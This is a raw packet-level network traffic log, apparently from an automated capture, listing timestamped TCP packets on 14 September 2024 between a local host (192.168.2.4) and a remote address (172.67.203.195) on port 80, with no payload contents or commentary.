                                        Sep 14, 2024 18:31:07.268786907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.884438038 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.887370110 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.892255068 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.030612946 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.030648947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.030724049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.030770063 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.030808926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.030843019 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.030877113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.030910015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.030945063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.030975103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.031007051 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.031044006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.031095982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.031095982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.031095982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.031095982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.035868883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.036053896 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.036087990 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.036132097 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.036184072 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.117645979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.117701054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.117737055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.117770910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.117805004 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.117837906 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.117921114 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.117921114 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.117921114 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.118078947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.118108034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.118164062 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.118207932 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.118292093 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.118325949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.118355036 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.118383884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.118417978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.118451118 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.118457079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.118508101 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.119271994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.119322062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.119355917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.119373083 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.119411945 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.119446993 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.119462013 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.119482040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.119528055 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.120136976 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.120193005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.120222092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.120248079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.161128998 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.161175966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.161196947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.161398888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.204425097 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204492092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204524994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204559088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204581022 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.204593897 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204647064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204647064 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.204680920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204749107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204766989 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.204798937 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204812050 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.204834938 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204866886 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204886913 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.204900026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204956055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.204958916 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.205665112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.205698967 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.205724001 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.205750942 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.205785036 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.205810070 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.205820084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.205852985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.205873966 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.205888033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.205921888 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.205945969 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.206600904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.206645012 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.206660032 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.206696987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.206729889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.206763029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.206763983 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.206796885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.206820965 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.206831932 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.206866980 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.206887007 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.207459927 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.207515955 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.207518101 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.207550049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.207602978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.207611084 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.207637072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.207672119 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.207695961 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.207706928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.207741976 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.207762957 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.208667040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.208700895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.208731890 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.208754063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.208787918 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.208811045 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.208822012 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.208856106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.208878040 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.246764898 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.246798992 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.246831894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.246865034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.246874094 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.246898890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.246927977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.246941090 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.247073889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.291560888 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291604996 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291649103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291666985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291701078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291718006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291753054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291785002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291820049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291848898 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291882992 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291917086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.291922092 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.291949987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292011976 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.292012930 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.292053938 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292109013 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292143106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292165995 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.292176962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292228937 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.292229891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292263985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292318106 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.292654037 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292687893 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292741060 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292745113 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.292774916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292808056 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292848110 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.292859077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292893887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292921066 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.292927027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292960882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.292980909 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.292993069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.293037891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.293051004 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.294699907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.294751883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.294763088 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.294787884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.294837952 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.294846058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.294872999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.294924021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.294950008 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.294959068 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.294991016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295020103 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295022964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295057058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295097113 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295109034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295144081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295169115 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295177937 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295211077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295232058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295243979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295278072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295295954 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295309067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295361042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295367002 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295413017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295466900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295473099 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295520067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295571089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295577049 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295604944 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295638084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295660973 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295672894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295705080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295727015 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295738935 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295770884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295799971 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295804977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295839071 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295860052 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295872927 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295905113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295923948 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.295937061 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295972109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.295989990 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.296005011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296040058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296057940 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.296291113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296344042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296350002 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.296380043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296432018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296435118 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.296464920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296499014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296519995 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.296531916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296565056 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.296582937 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.334278107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334331989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334386110 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334418058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334450960 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334482908 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334480047 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.334481001 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.334516048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334547997 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334582090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334590912 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.334590912 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.334614992 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334644079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.334649086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.334709883 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.365273952 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.379662991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.379834890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.379864931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380001068 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380021095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380053043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380085945 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380088091 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380122900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380142927 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380176067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380209923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380234003 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380244017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380295992 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380297899 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380347013 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380381107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380403996 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380414009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380445957 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380470037 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380496025 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380527973 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380552053 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380562067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380594015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380614996 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380662918 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380693913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380717039 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380728006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380764008 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380784988 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380815029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380842924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380868912 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380877018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380911112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380932093 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.380943060 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380976915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.380995035 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381009102 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381042004 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381064892 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381076097 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381108999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381131887 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381141901 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381175041 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381201029 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381206989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381241083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381263971 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381273031 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381304979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381325960 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381355047 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381392956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381419897 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381423950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381458044 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381479979 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381490946 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381525040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381548882 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381557941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381592035 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381613016 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381705046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381738901 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381764889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381772041 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381805897 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381828070 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.381839037 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381871939 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381891012 CEST4973880192.168.2.4172.67.203.195
